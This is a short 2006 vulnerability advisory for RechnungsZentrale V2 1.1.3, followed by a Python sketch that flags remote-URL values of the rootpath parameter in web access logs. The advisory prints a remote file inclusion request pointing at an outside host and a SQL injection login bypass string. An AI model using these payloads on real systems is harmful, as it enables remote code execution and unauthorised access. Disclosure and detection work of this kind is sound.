RechnungsZentrale V2 <= 1.1.3 Remote Inclusion Vulnerability

2006-04-19 00:00:00

- GroundZero Security Research and Software Development 2006 -

Software: RechnungsZentrale V2
Version: 1.1.3, likely older versions are affected as well.
Vendor: http://www.nfec.de/

Remote Inclusion:
http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4

SQL Injection:
User: ' OR '1'='1
Password: 1

- Bugs discovered by GroundZero Security Research and Software Development -
- http://www.GroundZero-Security.com | Http://www.g-0.org -
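
Detection sketch for the remote inclusion above, added here as an example and not part of the original advisory: it scans web access logs for requests that supply `rootpath` and marks values carrying a URL scheme, matched case-insensitively because the advisory's request uses `Http://`. The log lines are constructed, and treating any client-supplied `rootpath` as suspicious is an assumption about the application.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [19/Apr/2006:10:00:01 +0200] "GET /mod/authent.php4 HTTP/1.1" 200 512
192.0.2.11 - - [19/Apr/2006:10:00:05 +0200] "GET /mod/authent.php4?rootpath=Http://server.tld/mod/db.php4 HTTP/1.1" 200 90
192.0.2.12 - - [19/Apr/2006:10:00:09 +0200] "GET /mod/authent.php4?rootpath=%68ttp%3A%2F%2Fserver.tld%2Fx HTTP/1.1" 200 90
192.0.2.13 - - [19/Apr/2006:10:00:12 +0200] "GET /favicon.ico HTTP/1.1" 200 2048
192.0.2.14 - - [19/Apr/2006:10:00:15 +0200] "GET /mod/authent.php4?rootpath=../ HTTP/1.1" 200 90
"""

# Client address and request target from one access-log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/')
# Any scheme:// prefix; re.I so "Http://" and "HTTP://" match too.
SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.I)


def classify(target):
    """Return (severity, decoded value) if the request sets rootpath, else None."""
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name != "rootpath":      # PHP variable names are case-sensitive
            continue
        value = unquote(value)      # second pass catches double encoding
        if SCHEME_RE.match(value):
            return ("remote-url", value)
        # Assumption: a client never legitimately sets rootpath.
        return ("client-supplied", value)
    return None


def scan(log_text):
    """Return a list of (client, severity, value) for flagged log lines."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        verdict = classify(m.group(2))
        if verdict:
            hits.append((m.group(1),) + verdict)
    return hits


if __name__ == "__main__":
    for client, severity, value in scan(SAMPLE_LOG):
        print(f"{severity:16} {client:12} rootpath={value!r}")
```
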


Fixes

No fixes
